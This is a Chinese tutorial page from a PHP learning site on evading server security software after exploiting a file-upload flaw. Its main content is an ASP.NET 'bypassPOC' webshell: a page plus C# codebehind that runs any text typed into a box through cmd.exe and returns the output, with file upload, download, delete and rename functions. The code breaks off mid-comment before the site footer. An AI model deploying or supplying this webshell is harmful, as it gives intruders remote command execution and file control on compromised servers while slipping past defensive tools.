来源:自学PHP网 时间:2015-04-15 15:00 作者: 阅读:次
[导读] 这个方法建立在基于存在各种姿势可能存在的上传漏洞的基础上,被拦截后如何绕过安全防护进行部分或全部操作目前java没进行测试,这个猜测未经验证:可能javaweb可以把shell的代码写进...
这个方法建立在基于存在各种姿势可能存在的上传漏洞的基础上,被拦截后如何绕过安全防护进行部分或全部操作 目前java没进行测试,这个猜测未经验证:可能javaweb可以把shell的代码写进jar包中,进行调用执行,不太熟悉java...应该这个是同.net引用dll代码.
正常如果能传shell上去的话比如站里面装了狗,是会被狗查出来拦截的
<%@ Page Language="C#" AutoEventWireup="true" CodeBehind="bypassPOC.aspx.cs" Inherits="bypassPOC.Default" %> <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head runat="server"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <title></title> </head> <body> <form id="form1" runat="server"> <div> <asp:TextBox ID="tb" runat="server"></asp:TextBox> <br /> <asp:Button ID="Button1" runat="server" OnClick="Button1_Click" Text="Button" /> <br /> </div> <div> <asp:DropDownList ID="DropDownList1" runat="server" Width="200px" AutoPostBack="True" OnSelectedIndexChanged="DropDownList1_SelectedIndexChanged"> <asp:ListItem Value="-1">选择功能</asp:ListItem> <asp:ListItem Value="0">上传限制</asp:ListItem> <asp:ListItem Value="1">上传文件</asp:ListItem> <asp:ListItem Value="2">管理文件</asp:ListItem> </asp:DropDownList> <asp:Label ID="lbl_FolderInfo" runat="server"></asp:Label><br /> <asp:MultiView ID="MultiView1" runat="server"> <!--上传限制界面开始--> <asp:View ID="view_Configure" runat="server"> 允许上传文件的类型: <asp:BulletedList ID="bl_TileTypeLimit" runat="server"> </asp:BulletedList> 允许上传单个文件的大小: <asp:Label ID="lab_FileSizeLimit" runat="server" Text=""></asp:Label> </asp:View> <asp:View ID="view_Upload" runat="server"> <asp:FileUpload ID="FileUpload" runat="server" Width="400"/><br /> <asp:Button ID="btn_Upload" runat="server" Text="上传文件" OnClick="btn_Upload_Click" /> </asp:View> <!--管理文件开始--> <asp:View ID="view_Manage" runat="server"> <table cellpadding="5" cellspacing="0" border="0"> <tr> <td> <!--启用了AutoPostBack--> <asp:ListBox ID="lb_FileList" runat="server" AutoPostBack="True" Height="300px" Width="300px" OnSelectedIndexChanged="lb_FileList_SelectedIndexChanged"></asp:ListBox></td> <td valign="top"> <asp:Label ID="lbl_FileDescription" runat="server"></asp:Label></td> </tr> </table> <asp:Button ID="btn_DownLoad" runat="server" Text="下载文件" OnClick="btn_DownLoad_Click" /> <!--在删除前给予确定--> <asp:Button ID="btn_Delete" runat="server" Text="删除文件" OnClientClick="return confirm('确定删除文件!')" OnClick="btn_Delete_Click" /><br /> <asp:TextBox ID="tb_FileNewName" runat="server" Width="300px"></asp:TextBox> <asp:Button ID="btn_Rename" runat="server" Text="对文件重命名" OnClick="btn_Rename_Click" /> </asp:View> </asp:MultiView> </div> </form> </body> </html>
using System; using System.IO; using System.IO.Compression; using System.Diagnostics; using System.Data; using System.Data.OleDb; using System.Data.Common; using System.Data.SqlClient; using Microsoft.Win32; using System.Net; using System.Net.Sockets; using System.Reflection; using System.Runtime.InteropServices; using System.Text.RegularExpressions; using System.Security; using System.Security.Permissions; using System.Threading; using System.Web; using System.Web.UI.WebControls; namespace bypassPOC { public partial class Default : System.Web.UI.Page { protected void Page_Load(object sender, EventArgs e) { if (!Page.IsPostBack) { //初始化文件夹信息 InitFolderInfo(); //初始化列表框控件文件列表信息 InitFileList(); } } protected void Button1_Click(object sender, EventArgs e) { string text = this.tb.Text; Process process = new Process { StartInfo = { FileName = "cmd.exe", UseShellExecute = false, RedirectStandardInput = true, RedirectStandardOutput = true, RedirectStandardError = true, CreateNoWindow = true } }; string s = null; process.Start(); process.StandardInput.WriteLine(text); process.StandardInput.WriteLine("exit"); s = process.StandardOutput.ReadToEnd(); process.WaitForExit(); process.Close(); base.Response.Write("<pre>"); base.Response.Write(base.Server.HtmlEncode(s)); base.Response.Write("</pre>"); } #region 初始化文件夹信息 private void InitFolderInfo() { //从config中读取文件上传路径 string strFileUpladPath = "/"; //如果上传文件夹不存在,则根据config创建一个 if (!Directory.Exists(Server.MapPath(strFileUpladPath))) { Directory.CreateDirectory(Server.MapPath(strFileUpladPath)); } //将虚拟路径转换为物理路径 string strFilePath = Server.MapPath(strFileUpladPath); //从config里读取文件夹容量限制 double iFolderSizeLimit = 102400; //声明文件夹已经使用的容量 double iFolderCurrentSize = 0; //获取文件夹中的所有文件 FileInfo[] arrFiles = new DirectoryInfo(strFilePath).GetFiles(); //循环文件获已经使用的容量 foreach (FileInfo fi in arrFiles) { iFolderCurrentSize += Convert.ToInt32(fi.Length / 1024); } #region 第二种获得文件夹使用大小的方法 //DirectoryInfo dir = new DirectoryInfo(strFilePath); //foreach (FileSystemInfo fi in dir.GetFileSystemInfos()) //{ // FileInfo finf = new FileInfo(fi.FullName); // iFolderCurrentSize += Convert.ToInt32(finf.Length / 1024); / |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com